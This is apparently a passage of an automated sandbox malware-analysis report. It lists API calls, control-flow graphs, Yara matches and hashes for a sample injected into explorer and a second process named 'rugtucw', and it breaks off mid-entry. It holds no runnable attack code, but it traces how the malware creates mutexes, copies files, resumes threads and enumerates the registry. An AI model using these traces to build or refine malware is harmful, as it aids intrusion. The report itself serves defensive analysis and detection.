                                    • Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateDeleteHandleWrite
                                    • String ID: |:|
                                    • API String ID: 656945655-3736120136
                                    • Opcode ID: 6f51fc8c795d8a4c50054dd9dd6375db586eadb592f6c69123eb5a659cebd061
                                    • Instruction ID: 31951749de4845e6eb0afbbe96793432d243860f204773f3839a2fd683936d86
                                    • Opcode Fuzzy Hash: 6f51fc8c795d8a4c50054dd9dd6375db586eadb592f6c69123eb5a659cebd061
                                    • Instruction Fuzzy Hash: C8E1B630718F498FD719EB68D8587AAB6D1FB98311F140A2ED49FC3281DF74E9128786

                                    Control-flow Graph

                                    APIs
                                    • DeleteFileW.KERNEL32 ref: 03F11F8E
                                    • CopyFileW.KERNEL32 ref: 03F11F9D
                                    • DeleteFileW.KERNEL32 ref: 03F11FAE
                                    • DeleteFileW.KERNEL32 ref: 03F11FF9
                                      • Part of subcall function 03F14920: SetFileAttributesW.KERNEL32 ref: 03F1496F
                                      • Part of subcall function 03F14920: CreateFileW.KERNEL32 ref: 03F14999
                                      • Part of subcall function 03F14920: SetFileTime.KERNEL32 ref: 03F149C4
                                    • CreateFileW.KERNEL32 ref: 03F12085
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Delete$Create$AttributesCopyTime
                                    • String ID:
                                    • API String ID: 642576546-0
                                    • Opcode ID: c9a8b242e8538c8a596b46622d931eaf5b4ee49f838b165805a5d845044288d2
                                    • Instruction ID: 7efe76815c299a564505a13071e516dfa29de2f853b8e0618cb18f8f5c9c09a4
                                    • Opcode Fuzzy Hash: c9a8b242e8538c8a596b46622d931eaf5b4ee49f838b165805a5d845044288d2
                                    • Instruction Fuzzy Hash: 8B414A20718B4C4FDBA8EFACA85876E72D2EBDC610F50453EA80EC7395DE349D168781

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AgentCloseObtainOpenQueryStringUserValue
                                    • String ID:
                                    • API String ID: 2776781324-0
                                    • Opcode ID: 124a24ccff01973afbbfa654a37647f442dad4c39a908a6108de9be2510c5fce
                                    • Instruction ID: 012fe7c2dfdf3648df839b9972efaa2ab5e55f43b166bfd6912048ea3c113e5f
                                    • Opcode Fuzzy Hash: 124a24ccff01973afbbfa654a37647f442dad4c39a908a6108de9be2510c5fce
                                    • Instruction Fuzzy Hash: 1331A631608A4D8FDB18EF68E8496EA77E6FBD8310B00027AD85EC7245EF74D8164791

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 299 3f132ec-3f1333f CreateFileW 300 3f13341-3f13351 299->300 301 3f133b5-3f133b8 299->301 307 3f13353-3f13387 call 3f15328 ReadFile 300->307 308 3f133ac-3f133af CloseHandle 300->308 302 3f13420-3f13421 301->302 303 3f133ba-3f133bd 301->303 304 3f13423-3f1343c 302->304 303->302 305 3f133bf-3f133e1 call 3f15328 call 3f14f1c 303->305 315 3f133e3-3f13406 305->315 316 3f1338f-3f133a3 call 3f14fc8 307->316 308->301 320 3f13408-3f1341e call 3f152cc * 2 315->320 316->308 321 3f133a5-3f133a6 316->321 320->304 321->308
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleRead
                                    • String ID:
                                    • API String ID: 1035965006-0
                                    • Opcode ID: 45dd2faa1a948ea95e9360be84c1b36019cfb3e3e5fdd4ccf7d41cb8eff1be19
                                    • Instruction ID: 56da2dbf936c1bccd8783048851fd52a1698ce90eb7d6533d6366be8f60874ae
                                    • Opcode Fuzzy Hash: 45dd2faa1a948ea95e9360be84c1b36019cfb3e3e5fdd4ccf7d41cb8eff1be19
                                    • Instruction Fuzzy Hash: 2F41933471CF0D4FD75CEA6CA85977AB6D2EBC9211F14023EA49FC3255DE64982247C2

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 03F14C90: GetVolumeInformationA.KERNEL32 ref: 03F14CFD
                                    • CreateMutexExA.KERNEL32 ref: 03F11DFF
                                    • CreateFileMappingA.KERNEL32 ref: 03F11EB1
                                    • SleepEx.KERNEL32 ref: 03F11EEE
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Create$FileInformationMappingMutexSleepVolume
                                    • String ID:
                                    • API String ID: 3744091137-0
                                    • Opcode ID: 23ec66ca705902b67a540bca7c19e900529aa90bb2bcabfc2642f3835ab79b02
                                    • Instruction ID: 4ff7eafc09863aed923c2c639212565d81dae47cedd50015e136709de661f4c0
                                    • Opcode Fuzzy Hash: 23ec66ca705902b67a540bca7c19e900529aa90bb2bcabfc2642f3835ab79b02
                                    • Instruction Fuzzy Hash: 63416530B14F088FDB64EB78D4587AEB6D2EB98706F144A3E805FD6240CF7595169781

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$AttributesCreateTime
                                    • String ID:
                                    • API String ID: 1986686026-0
                                    • Opcode ID: 565d0868f014618fd66a55a8d321e8b6f06e9e45a82950fabe7a64ea4898b9d8
                                    • Instruction ID: 37a445b3252c6d1677d14d4354bab3a728fe8fe7cea6566489215b8358c4f74a
                                    • Opcode Fuzzy Hash: 565d0868f014618fd66a55a8d321e8b6f06e9e45a82950fabe7a64ea4898b9d8
                                    • Instruction Fuzzy Hash: 4F21003071CB488FDF64EF68988879EB6E2FBDC701F10456EA85ED7245DA34DA058782

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 382 3f13f7c-3f13fbd 383 3f13fc6-3f1400c call 3f15328 call 3f15274 call 3f14434 382->383 384 3f13fbf-3f13fc1 382->384 392 3f1401a-3f14020 383->392 393 3f1400e-3f14018 383->393 385 3f1439c-3f143b7 384->385 394 3f14022-3f14030 392->394 393->394 396 3f14036-3f1406d 394->396 397 3f1438e-3f1439a call 3f152cc 394->397 402 3f14383-3f14384 396->402 403 3f14073-3f1409e 396->403 397->385 402->397 403->402 405 3f140a4-3f140b9 403->405 406 3f140bb-3f140bd 405->406 407 3f1410f-3f14114 405->407 408 3f14117-3f14150 406->408 409 3f140bf-3f140db call 3f14f1c 406->409 407->408 413 3f14350-3f1435d 408->413 414 3f14156-3f1415c 408->414 415 3f140f9-3f1410d call 3f14f1c 409->415 416 3f140dd-3f140f4 call 3f14fc8 409->416 428 3f1436a-3f1436d 413->428 429 3f1435f-3f14365 call 3f152cc 413->429 417 3f1417e-3f14188 414->417 418 3f1415e-3f1417b 414->418 415->408 416->415 421 3f14233-3f14259 417->421 422 3f1418e-3f14199 417->422 418->417 436 3f14332-3f14343 421->436 437 3f1425f-3f14270 421->437 426 3f141a0-3f1422b call 3f14f1c call 3f15328 call 3f15384 call 3f14f1c call 3f143c0 call 3f152cc * 3 422->426 427 3f1419b 422->427 426->421 427->426 433 3f1437a-3f14380 428->433 434 3f1436f-3f14375 call 3f152cc 428->434 429->428 433->402 434->433 436->413 445 3f14345-3f1434b call 3f152cc 436->445 437->436 444 3f14276-3f142a1 RtlAllocateHeap 437->444 447 3f142a3-3f142ad 444->447 445->413 450 3f142cd-3f142eb 447->450 451 3f142af-3f142cb RtlReAllocateHeap 447->451 456 3f142ed 450->456 457 3f142ef-3f142f4 450->457 451->450 456->457 457->447 458 3f142f6-3f14301 457->458 460 3f14303-3f14309 call 3f15368 458->460 461 3f14322-3f1432a 458->461 464 3f1430e-3f14318 460->464 461->436 464->461
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: aabcf5188b93bf161ff104ab7ec3af3a54eff4fac3a890b7a33b8689a9ac2ea0
                                    • Instruction ID: 18db897856dad706a0ad8381dadaa2634454f56885d306bbf8dd8542fd81b9a3
                                    • Opcode Fuzzy Hash: aabcf5188b93bf161ff104ab7ec3af3a54eff4fac3a890b7a33b8689a9ac2ea0
                                    • Instruction Fuzzy Hash: 1CD17130B18B498FDB54EF69E84566EB7F2FB98701F50452DE44AD3241DF74E8128B82

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 470 3f12cd0-3f12cfe call 3f132ec 473 3f12f92-3f12fa2 470->473 474 3f12d04-3f12d0f 470->474 474->473 475 3f12d15-3f12d17 474->475 476 3f12f7d-3f12f8d call 3f152cc 475->476 477 3f12d1d-3f12d26 475->477 476->473 477->476 479 3f12d2c-3f12d33 477->479 479->476 480 3f12d39-3f12d6f call 3f14d8c 479->480 480->476 485 3f12d75-3f12d94 call 3f14518 480->485 488 3f12f67-3f12f78 call 3f152cc * 2 485->488 489 3f12d9a-3f12d9b 485->489 488->476 491 3f12d9d-3f12dbf 489->491 495 3f12f55-3f12f60 491->495 496 3f12dc5-3f12de0 call 3f14fc8 491->496 495->488 496->495 499 3f12de6-3f12dea 496->499 499->495 500 3f12df0-3f12e02 499->500 501 3f12e04-3f12e06 500->501 502 3f12e0c-3f12e31 call 3f14578 500->502 501->502 503 3f12f34-3f12f4f SleepEx 501->503 506 3f12e37-3f12ee9 call 3f15328 call 3f12fac 502->506 507 3f12f29-3f12f2f call 3f152cc 502->507 503->491 503->495 518 3f12eeb-3f12ef3 506->518 519 3f12efa-3f12f0a ResumeThread call 3f152cc 506->519 507->503 518->519 521 3f12f0f-3f12f22 519->521 521->507
                                    APIs
                                      • Part of subcall function 03F132EC: CreateFileW.KERNEL32 ref: 03F13332
                                      • Part of subcall function 03F132EC: ReadFile.KERNEL32 ref: 03F13379
                                      • Part of subcall function 03F132EC: CloseHandle.KERNEL32 ref: 03F133AF
                                    • ResumeThread.KERNEL32 ref: 03F12EFE
                                    • SleepEx.KERNEL32 ref: 03F12F43
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleReadResumeSleepThread
                                    • String ID:
                                    • API String ID: 2967322886-0
                                    • Opcode ID: 808c4aee07e9b8fc3710cb3cfd08703c7f933d42faf171cdfe3304c79b09faa0
                                    • Instruction ID: a4b35f2aca3d83f6e3f1a6215f7864bd538d9f2d5a3f0c898818fe4401b7419c
                                    • Opcode Fuzzy Hash: 808c4aee07e9b8fc3710cb3cfd08703c7f933d42faf171cdfe3304c79b09faa0
                                    • Instruction Fuzzy Hash: EC71A830708F499FD768EB68D8587BAB3E2FB98311F54452DD49EC7241DF34A8528782

                                    Control-flow Graph

                                    APIs
                                    • GetTokenInformation.ADVAPI32 ref: 03F14A94
                                    • GetTokenInformation.ADVAPI32 ref: 03F14ACB
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InformationToken
                                    • String ID:
                                    • API String ID: 4114910276-0
                                    • Opcode ID: dd184fa1f844f5e8a027601eca024ae3d96259d199610c41deb9d1b16245fd89
                                    • Instruction ID: b3073f6a4c96599acd326a9d9390f9c9f07de562663df3b065a4b5eea4c5e508
                                    • Opcode Fuzzy Hash: dd184fa1f844f5e8a027601eca024ae3d96259d199610c41deb9d1b16245fd89
                                    • Instruction Fuzzy Hash: 1C213134608B488FC754EB28D49866AB7F2FBD9311B000A6EE49EC7264CB70E845DB81

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 538 3f13cd0-3f13ce0 539 3f13ce2-3f13d04 EnumWindows SleepEx 538->539 540 3f13d06-3f13d14 538->540 539->539 539->540
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: EnumSleepWindows
                                    • String ID:
                                    • API String ID: 498413330-0
                                    • Opcode ID: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                    • Instruction ID: 7d3923eaf92ea6fce2d36599f6d2d69ec59c036f737c828d4a198accd0c49510
                                    • Opcode Fuzzy Hash: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                    • Instruction Fuzzy Hash: 92E04F30A046098FEB28EBA4C0D8BB036A2EB18206F28017BDC0EDD285CB764955C720
                                    APIs
                                    • CreateProcessInternalW.KERNEL32 ref: 03F1465C
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateInternalProcess
                                    • String ID:
                                    • API String ID: 2186235152-0
                                    • Opcode ID: f499db2da455559fe39320c52f4be417c059e9f1e2dbc18636465e4cf963e26f
                                    • Instruction ID: ad687d4c1e9825856da35244f014a3978af48ac88cb480991580ac3f32e30d34
                                    • Opcode Fuzzy Hash: f499db2da455559fe39320c52f4be417c059e9f1e2dbc18636465e4cf963e26f
                                    • Instruction Fuzzy Hash: 24316B70718F484FCB98EF68A08875AB6E2FBD8311F104A6EE44ED7249DFB4D8458781
                                    APIs
                                    • GetVolumeInformationA.KERNEL32 ref: 03F14CFD
                                      • Part of subcall function 03F15174: CryptAcquireContextA.ADVAPI32 ref: 03F151A9
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AcquireContextCryptInformationVolume
                                    • String ID:
                                    • API String ID: 4059528372-0
                                    • Opcode ID: 6360c7cb42068f0464419020233b993fd04aec100295d9fc2771373569cbd1ae
                                    • Instruction ID: 20d5ea0a1fc6c2619e6ef1b29578c087aedfed5a47bc2f8bf16bd5c242b8c32a
                                    • Opcode Fuzzy Hash: 6360c7cb42068f0464419020233b993fd04aec100295d9fc2771373569cbd1ae
                                    • Instruction Fuzzy Hash: D3316931618B4C8FDB64EF68D848BAA77E1FBE8311F10462E984ED7264DE30D9458B81
                                    APIs
                                      • Part of subcall function 03F119D0: RtlCreateHeap.NTDLL ref: 03F11AE7
                                    • SleepEx.KERNEL32(?,?,?,?,?,?,?,03F11973), ref: 03F119A0
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.606652331.0000000003F11000.00000020.80000000.00040000.00000000.sdmp, Offset: 03F11000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_3f11000_explorer.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateHeapSleep
                                    • String ID:
                                    • API String ID: 221814145-0
                                    • Opcode ID: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                    • Instruction ID: 5a3e2d2818d95181a13b116223679336c80df74f007b39ff42168fe8c4c31eba
                                    • Opcode Fuzzy Hash: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                    • Instruction Fuzzy Hash: FBE04814714B0D5BDB94F779B88473C72A1DBC8250F941579662FCA285D824C8608312
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000010.00000002.505223823.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_16_2_2d0000_rugtucw.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: <Q($D@($D@($D@($D@(
                                    • API String ID: 0-3811455346
                                    • Opcode ID: 4bc4beb4afbd806fa74f9af4b1a45304a6e4014ad1fc9ebd0b5f45e0adeb440a
                                    • Instruction ID: 8429db74f1fa85a2ab0a671fc7dd74302b9d5344744917b2108e7ac53c8172df
                                    • Opcode Fuzzy Hash: 4bc4beb4afbd806fa74f9af4b1a45304a6e4014ad1fc9ebd0b5f45e0adeb440a
                                    • Instruction Fuzzy Hash: 3B02B3316102559FCB14EF64D894AAEB7F6FFC4300F148A6AE9099B395DB71EC42CB90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000010.00000002.505223823.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_16_2_2d0000_rugtucw.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: D@($D@(
                                    • API String ID: 0-1322129975
                                    • Opcode ID: 7d633d8faf910608cc41b3142252474fe7b30a15c952532c3ba79d292cfaabf3
                                    • Instruction ID: 70ab0bcbdaacb9dab71a06b6aa8f89f18eeed378f3e835e8be84ec033fd436ca
                                    • Opcode Fuzzy Hash: 7d633d8faf910608cc41b3142252474fe7b30a15c952532c3ba79d292cfaabf3
                                    • Instruction Fuzzy Hash: 03112B35B101149FC705BBB5E85979D7FB5DF86300F0040ABE6199B395DE349D05C7A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000010.00000002.505223823.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_16_2_2d0000_rugtucw.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 8!p
                                    • API String ID: 0-2808226621
                                    • Opcode ID: ff099371b8e47087d10af0d972824f13c97d16e2762f7116254e4e4c13dc5f3c
                                    • Instruction ID: 0530aa2b99ff840cdbbcdfeead8db18bbf15b2b60ec39439d4e4b0b8accebc95
                                    • Opcode Fuzzy Hash: ff099371b8e47087d10af0d972824f13c97d16e2762f7116254e4e4c13dc5f3c
                                    • Instruction Fuzzy Hash: 6E116636615390AFD703AB74F898B593F689B86320F0541DBE5118B793E9209D14CBA0
                                    Memory Dump Source
                                    • Source File: 00000010.00000002.505223823.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_16_2_2d0000_rugtucw.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1087c0c226eb2670a266267eb981c944aa5592c7f76453e0f4b3cfdcdf9a09ce
                                    • Instruction ID: efd891778097760c93ee6f4a5608d39b165886504278c2ba1eebc3751f3b2cb6
                                    • Opcode Fuzzy Hash: 1087c0c226eb2670a266267eb981c944aa5592c7f76453e0f4b3cfdcdf9a09ce
                                    • Instruction Fuzzy Hash: DBD15F38215302CFD705DF24D888B6A7BE6FF89304F64896AD9068B365DB75EC51CBA0
                                    Memory Dump Source
                                    • Source File: 00000010.00000002.505223823.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_16_2_2d0000_rugtucw.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9152d969f965ca20d8e4d23aa7ba5c4a8511d97070dab1d5b58749d790d0a1dd
                                    • Instruction ID: 464fe26568d6834c8a2149a7e5be1f0cc4dcf461938628378e8438b63a9b4642
                                    • Opcode Fuzzy Hash: 9152d969f965ca20d8e4d23aa7ba5c4a8511d97070dab1d5b58749d790d0a1dd
                                    • Instruction Fuzzy Hash: DC212C343406108FC749EF38C46992D7BE6AF8A75532545E9E406CF3B2DA35EC42CB91
                                    Memory Dump Source
                                    • Source File: 00000010.00000002.505223823.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_16_2_2d0000_rugtucw.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4e3baf51c93973be23185843df4ffc181376a9d72119fa27fb958b408af082d9
                                    • Instruction ID: f20bcccc2007b25ed9aa0e901cf9e926855147fb8348c9d2183fa077993417af
                                    • Opcode Fuzzy Hash: 4e3baf51c93973be23185843df4ffc181376a9d72119fa27fb958b408af082d9
                                    • Instruction Fuzzy Hash: 2B012B76701611AFC3219B25F88CD1F3BA8EB897607120696F945CB719DA70DC1087A0
                                    Memory Dump Source
                                    • Source File: 00000010.00000002.505223823.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_16_2_2d0000_rugtucw.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d4591a5e01f29322e8bd89fff20d5379eb8d640b52efe580b3d8d18aad2d29d7
                                    • Instruction ID: bca8b0a08980cca5302f7b311f7491ecc4af88eea4f50afe2a5660c8b813f26a
                                    • Opcode Fuzzy Hash: d4591a5e01f29322e8bd89fff20d5379eb8d640b52efe580b3d8d18aad2d29d7
                                    • Instruction Fuzzy Hash: AAF0B4B170A3502FD7091B356C55AAF7BA9DFCA15070844BBE809C7392DD759C0683E0
                                    Memory Dump Source
                                    • Source File: 00000010.00000002.505223823.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_16_2_2d0000_rugtucw.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0ff1879d5ad57094083ef2971a04cddf89bd0c1f27ec91fa7658c1b66487eaa1
                                    • Instruction ID: 05296cc8fe91ec13f45ed512a18164a47efed32920c47de5eb432944978fe2a6
                                    • Opcode Fuzzy Hash: 0ff1879d5ad57094083ef2971a04cddf89bd0c1f27ec91fa7658c1b66487eaa1
                                    • Instruction Fuzzy Hash: 4CF02B35A0D38DAFC706DFF5A85C5CA7FFCEE46110B0440EBE408C7212E53058008761
                                    Memory Dump Source
                                    • Source File: 00000010.00000002.505223823.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_16_2_2d0000_rugtucw.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 122641562822a8883af0971b01322605cd3e2a8c3e30008c5c50e867d69922a6
                                    • Instruction ID: ed3e768b72843b239ec9f67af6d02a1be0b5a7d3eaa75535f43a6870f092ede4
                                    • Opcode Fuzzy Hash: 122641562822a8883af0971b01322605cd3e2a8c3e30008c5c50e867d69922a6
                                    • Instruction Fuzzy Hash: 6BE06D3AA0411AAF8B04EFA9B84C5DA7BE9FA48222B008066E009D2210EA7058408790
                                    Memory Dump Source
                                    • Source File: 00000010.00000002.505223823.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_16_2_2d0000_rugtucw.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c4b151ba6cf8896445ff80e2df596d5432daffe1aa59a5ac6300690adaab38c3
                                    • Instruction ID: 55d1bd0f3348509a178ab7289a46540cd0047fea4fbd06d9ddb358eb25a9d324
                                    • Opcode Fuzzy Hash: c4b151ba6cf8896445ff80e2df596d5432daffe1aa59a5ac6300690adaab38c3
                                    • Instruction Fuzzy Hash: A8E0863810A3848FC7469F30B95C5113FE89B46300F4504D6E5858B267DA345C54C7B4
                                    Memory Dump Source
                                    • Source File: 00000010.00000002.505223823.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_16_2_2d0000_rugtucw.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3232ac24f5accbcd9947c3595fceab207085faffdc688e0dbae51ccef1f9d773
                                    • Instruction ID: e42229cf6dcddfd9983e6db8bd9d72e21d2faf3a68f968846794796fdec0887b
                                    • Opcode Fuzzy Hash: 3232ac24f5accbcd9947c3595fceab207085faffdc688e0dbae51ccef1f9d773
                                    • Instruction Fuzzy Hash: D8D0A776A0AA617BCB0156B5BD1D28C3F649A16250B0440BBD848C7191E6048D2483D2
                                    Memory Dump Source
                                    • Source File: 00000010.00000002.505223823.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_16_2_2d0000_rugtucw.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ea6dfa81113593beaab303e079e3ab8cd2ad56754a332d29ebddd99e2346b627
                                    • Instruction ID: 2a8682b33a897d7240639414280824d4f23eb3488aae6697b69ef193c056ddff
                                    • Opcode Fuzzy Hash: ea6dfa81113593beaab303e079e3ab8cd2ad56754a332d29ebddd99e2346b627
                                    • Instruction Fuzzy Hash: B5C0129848E2C02EDB03233028296043FB00B87208F89A0CBD1804A0F3C84C0828C329

                                    Execution Graph

                                    Execution Coverage:2.5%
                                    Dynamic/Decrypted Code Coverage:53.6%
                                    Signature Coverage:16.2%
                                    Total number of Nodes:586
                                    Total number of Limit Nodes:30
                                    execution_graph 27920 8a40e 27923 8a426 27920->27923 27927 8a4a2 27920->27927 27921 8a469 memcpy 27921->27927 27922 8a44a memcpy 27931 8a45d 27922->27931 27923->27921 27923->27922 27923->27927 27924 8a524 27933 8a2aa 17 API calls 27924->27933 27926 8a532 27928 8a53e memset 27926->27928 27926->27931 27927->27924 27929 8a501 27927->27929 27928->27931 27932 8a1c6 18 API calls 27929->27932 27932->27931 27933->27926 28440 a0e0c 22 API calls 28441 8ca01 _allmul _alldiv _allmul _alldiv 28332 b9000 28 API calls 28335 c5401 memset memcpy memcpy memset memcpy 28056 84406 28061 82e30 StrStrIW 28056->28061 28059 82e30 22 API calls 28060 8443a 28059->28060 28062 82ebc 28061->28062 28063 82e57 28061->28063 28087 81000 GetProcessHeap RtlAllocateHeap 28062->28087 28065 819e5 9 API calls 28063->28065 28067 82e68 28065->28067 28066 82ed0 RegOpenKeyExW 28068 82f68 28066->28068 28078 82eee 28066->28078 28067->28062 28088 81bc5 10 API calls 28067->28088 28069 81011 3 API calls 28068->28069 28072 82f6f 28069->28072 28071 82f50 RegEnumKeyExW 28074 82f5e RegCloseKey 28071->28074 28071->28078 28072->28059 28073 82e75 28075 82eb5 28073->28075 28077 81afe 10 API calls 28073->28077 28074->28068 28079 81011 3 API calls 28075->28079 28076 81953 6 API calls 28076->28078 28080 82e83 28077->28080 28078->28071 28078->28076 28081 8199d 9 API calls 28078->28081 28083 82e30 18 API calls 28078->28083 28086 81011 3 API calls 28078->28086 28079->28062 28082 8199d 9 API calls 28080->28082 28085 82e91 28080->28085 28081->28078 28082->28085 28083->28078 28084 81011 3 API calls 28084->28075 28085->28084 28086->28078 28087->28066 28088->28073 28337 85818 _alldiv _allrem _allmul 28444 af21c 23 API calls 28339 a7c28 8 API calls 28341 8482b 14 API calls 28342 a742e 24 API calls 28345 be024 83 API calls 28346 9943d 34 API calls 28451 a13ca 92 API calls 27934 83c40 27935 81b6a 2 API calls 27934->27935 27936 83c50 27935->27936 27937 83dfa 27936->27937 27970 81000 GetProcessHeap RtlAllocateHeap 27936->27970 27939 83c62 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 27971 d4bec 27939->27971 27941 83dec DeleteFileW 27942 81011 3 API calls 27941->27942 27942->27937 27943 83c9a 27943->27941 27944 83de3 27943->27944 27982 81000 GetProcessHeap RtlAllocateHeap 27943->27982 27990 d3848 66 API calls 27944->27990 27947 83cce 27983 a02ec 84 API calls 27947->27983 27949 83da8 27986 9fb92 83 API calls 27949->27986 27950 81fa7 19 API calls 27964 83cd9 27950->27964 27952 